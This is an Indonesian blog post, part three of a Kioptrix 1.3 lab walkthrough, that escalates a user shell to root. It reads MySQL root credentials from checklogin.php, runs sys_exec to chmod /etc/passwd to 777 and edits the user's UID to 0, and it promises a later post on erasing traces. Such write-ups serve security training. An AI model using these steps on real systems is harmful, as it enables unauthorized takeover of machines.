Penetration Testing Kioptrix Server 1.3: Mendapatkan Akses Root [3]

hacking Jan 05, 2020

Selanjutnya adalah mengincar akses root untuk bisa menguasai sistem secara penuh. Dengan cara mengubah akses john menjadi root perlu mencari tahu proses yang berjalan pada akses root, biasanya adalah mysql. Nah dengan bantuan service mysql file /etc/passwd akan dimdofikasi. File ```/etc/passwd`` adalah file yang menyimpan informasi konfigurasi akun pada linux. Akan tetapi hanya akses root yang bisa mengubah file tersebut. Untuk itulah cari ini dilakukan.

  1. Pertama-tama cari tau dulu proses-proses yang berjalan dengan akses root. Maka jalankan perintah diterminal :
ps -aux | grep root

hasil nya adalah seperti dibawah ini :

john@Kioptrix4:~$ ps -aux | grep root
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root         1  0.1  0.1   2844  1692 ?        Ss   05:31   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   05:31   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   05:31   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   05:31   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   05:31   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   05:31   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   05:31   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   05:31   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   05:31   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   05:31   0:00 [kacpi_notify]
root        90  0.0  0.0      0     0 ?        S<   05:31   0:00 [kseriod]
root       128  0.0  0.0      0     0 ?        S    05:31   0:00 [pdflush]
root       129  0.0  0.0      0     0 ?        S    05:31   0:00 [pdflush]
root       130  0.0  0.0      0     0 ?        S<   05:31   0:00 [kswapd0]
root       172  0.0  0.0      0     0 ?        S<   05:31   0:00 [aio/0]
root      1262  0.0  0.0      0     0 ?        S<   05:31   0:00 [ata/0]
root      1265  0.0  0.0      0     0 ?        S<   05:31   0:00 [ata_aux]
root      1274  0.0  0.0      0     0 ?        S<   05:31   0:00 [scsi_eh_0]
root      1277  0.0  0.0      0     0 ?        S<   05:31   0:00 [scsi_eh_1]
root      1297  0.0  0.0      0     0 ?        S<   05:31   0:00 [ksuspend_usbd]
root      1300  0.0  0.0      0     0 ?        S<   05:31   0:00 [khubd]
root      2028  0.0  0.0      0     0 ?        S<   05:31   0:00 [scsi_eh_2]
root      2307  0.0  0.0      0     0 ?        S<   05:31   0:00 [kjournald]
root      2474  0.0  0.0   2224   640 ?        S<s  05:31   0:00 /sbin/udevd --d
root      3106  0.0  0.0      0     0 ?        S<   05:31   0:00 [kpsmoused]
root      3998  0.0  0.0   1716   484 tty4     Ss+  05:32   0:00 /sbin/getty 384
root      3999  0.0  0.0   1716   492 tty5     Ss+  05:32   0:00 /sbin/getty 384
root      4003  0.0  0.0   1716   488 tty2     Ss+  05:32   0:00 /sbin/getty 384
root      4004  0.0  0.0   1716   488 tty3     Ss+  05:32   0:00 /sbin/getty 384
root      4006  0.0  0.0   1716   488 tty6     Ss+  05:32   0:00 /sbin/getty 384
root      4066  0.0  0.0   1872   540 ?        S    05:32   0:00 /bin/dd bs 1 if
root      4087  0.0  0.0   5316   988 ?        Ss   05:32   0:00 /usr/sbin/sshd
root      4143  0.0  0.0   1772   528 ?        S    05:32   0:00 /bin/sh /usr/bi
root      4185  0.0  1.5 126988 16228 ?        Sl   05:32   0:00 /usr/sbin/mysql
root      4187  0.0  0.0   1700   556 ?        S    05:32   0:00 logger -p daemo
root      4300  0.0  0.1   6528  1320 ?        Ss   05:32   0:00 /usr/sbin/nmbd
root      4302  0.0  0.2  10108  2312 ?        Ss   05:32   0:00 /usr/sbin/smbd
root      4316  0.0  0.0  10108  1024 ?        S    05:32   0:00 /usr/sbin/smbd
root      4317  0.0  0.1   8084  1292 ?        Ss   05:32   0:00 /usr/sbin/winbi
root      4337  0.0  0.1   8084  1056 ?        S    05:32   0:00 /usr/sbin/winbi
root      4349  0.0  0.0   2104   888 ?        Ss   05:32   0:00 /usr/sbin/cron
root      4371  0.0  0.5  20464  6188 ?        Ss   05:33   0:00 /usr/sbin/apach
root      4417  0.0  0.0   1716   492 tty1     Ss+  05:33   0:00 /sbin/getty 384
root      4423  0.0  0.3  11360  3716 ?        Ss   05:37   0:00 sshd: john [pri
john      4464  0.0  0.0   3008   772 pts/0    R+   05:40   0:00 grep root

kita fokus pada proses ini saja :

root      4185  0.0  1.5 126988 16228 ?        Sl   05:32   0:00 /usr/sbin/mysql

kesimpulan :
dari proses diatas dapat disimpulkan bahwa proses mysql dijalankan oleh hak akses root. Mysql adalah database yang digunakan pada website server Kioptrix. Untuk itu kita perlu masuk ke dalam mysql server Kioptrix. Akan tetapi untuk masuk kedalam mysql diperlukan username dan password juga.

  1. Jika di perhatikan ketika akses login dihalaman web server Kioptrix diperlukan check kondisi login disana pada file checklogin.php. Maka dapat disimpulkan bahwa didalam file checklogin.php tersebut terdapat koneksi ke mysql dimana diperlukan username dan password mysql juga. Jadi kita akan coba melihat isi file tersebut dengan perintah diterminal :
cat /var/www/checklogin.php

DeepinScreenshot_select-area_20200104185314
kesimpulan :
username = root
password = (kosong)

  1. Lalu kita coba masuk kedalam mysql.
mysql -h localhost -u root

keterangan :

  • -h adalah host.
  • -u adalah root.
  • -p adalah password. Jika password tidak kosong tambahkan setelah root. Dalam kasus ini password adalah kosong.

Jika seperti gambar dibawah ini maka telah masuk ke dalam mysql.
DeepinScreenshot_select-area_20200104185653

  1. Selanjutnya didalam mysql ketikan :
select sys_exec("chmod 777 /etc/passwd");

DeepinScreenshot_select-area_20200104190524
Jika seperti gambar ini output nya maka sukses mengubah akses dari file /etc/passwd.
5. Selanjutnya coba check file /etc/passwd dengan perintah :

ls -l /etc/passwd

DeepinScreenshot_select-area_20200104193848
okey sekarang semua user pada sistem memiliki hak akses penuh untuk file tersebut.

  1. Selanjutnya edit file tersebut.
vim /etc/passwd

rubah bagian :
john:x:1001:1001:,,,:/home/john:/bin/kshell
menjadi
john:x:0:0:,,,:/home/john:/bin/bash

untuk melakukan edit pada vim menggunakan keyword :

  • i untuk insert/menulis.
  • esc setelah menulis.
  • :w untuk menyimpan.
  • :q untuk exit dari vim
  1. setelah diedit, logout terlebih dulu. dengan perintah exit.
  2. Login lagi dengan user John.
    DeepinScreenshot_select-area_20200104200205
    maka nama disamping kiri akan langsung berubah menjadi root@Kioptrix4. dan untuk memastikan lebih pasti maka masukan perintah :
cat /root/congrats.txt

DeepinScreenshot_select-area_20200104200327
Tralaaa Berhasiiiiil....

Selanjutnya akan dibahas cara menghapus jejak yang telah dilakukan.

Semoga bermanfaat dan jika ada salah mohon dikoreksi dan komen dibawah.

Akhmad Syarif

i just want to be myself